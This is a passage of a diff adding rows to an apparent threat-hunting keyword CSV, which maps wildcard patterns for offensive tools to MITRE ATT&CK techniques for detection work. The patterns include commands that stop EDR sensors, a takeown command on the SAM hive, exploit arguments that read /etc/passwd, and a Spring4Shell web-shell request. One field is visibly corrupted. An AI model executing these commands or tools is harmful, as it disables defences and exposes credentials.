- TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
+"*System.DirectoryServices.AccountManagement.GroupPrincipal*FindByIdentity*D","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/LaresLLC/SlinkyCat","1","0","N/Aomain Admins*","N/A","1","70","3","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z"
+"*SYSTEM\CurrentControlSet\Services\dcrypt*","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","4","361","96","2023-08-13T11:20:25Z","2019-04-20T14:51:18Z"
+"*System32fileWritePermissions.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*systemctl disable cbdaemon*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*systemctl disable falcon-sensor.service*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
+"*systemctl start nessusd*","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A"
+"*systemctl stop cbdaemon*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*systemctl stop falcon-sensor.service*","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*SysWhispers.git *","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","0","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
+"*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","286","42","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z"
+"*syswhispers.py*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z"
+"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*syswhispers.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*syswhispers.py*","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","1","N/A","N/A","10","1006","148","2023-03-22T19:23:21Z","2022-03-07T18:56:21Z"
+"*SysWhispers2*","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via 
Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","29","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z"
+"*syswhispersv2_x86*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z"
+"*-t * -x lfr -f /etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z"
+"*-t * -x rce -a list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation 
tools","https://github.com/dunderhay/CVE-2020-5902","1","0","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z"
+"*T0XlCv1.rule*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*t3l3machus/BabelStrike*","offensive_tool_keyword","BabelStrike","The purpose of this tool is to normalize and generate possible usernames out of a full names list that may include names written in multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","1","38","13","2023-09-12T13:49:30Z","2023-01-10T07:59:00Z"
+"*t3l3machus/Synergy-httpx*","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","108","14","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z"
+"*TailorScan.exe *","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*TailorScan_darwin*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*TailorScan_freebsd*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*TailorScan_linux_*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*TailorScan_netbsd_*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*TailorScan_openbsd_*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*TailorScan_windows_*.exe*","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - 
T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","269","49","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z"
+"*tailscale up --advertise-routes=*/24*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*tailscaled --tun=userspace-networking --socks5-server=*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*take_shellcode.bat*","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - 
T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A",,"N/A",,,
+"*TakeMyRDP*logfile.txt*","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","1","95","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z"
+"*TakeMyRDP.cpp*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*TakeMyRDP.exe*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*TakeMyRDP.git*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*TakeMyRDP.h*","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation 
Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","1","95","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z"
+"*TakeMyRDP.sln*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*TakeMyRDP.vcxproj*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*TakeMyRDP2.0*","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","1","95","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z"
+"*TakeMyRDP-main*","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","3","278","56","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z"
+"*takeown /f ""C:\windows\system32\config\SAM""*","greyware_tool_keyword","takeown","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z"
+"*takeown /f C:\Windows\System32\amsi.dll /a*","greyware_tool_keyword","takeown","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://www.pavel.gr/blog/neutralising-amsi-system-wide-as-an-admin","1","0","N/A","10","8","N/A","N/A","N/A","N/A"
+"*takeshixx/nmap-scripts*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","1","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z"
+"*Taonn/EmailAll*","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","6","577","101","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z"
+"*target/tomcatwar.jsp?pwd=j&cmd=*","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","54","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z"
+"*targetedKerberoast.git*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","254","43","2023-07-16T22:06:29Z","2021-08-02T20:19:35Z"
+"*targetedKerberoast.py*","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - 
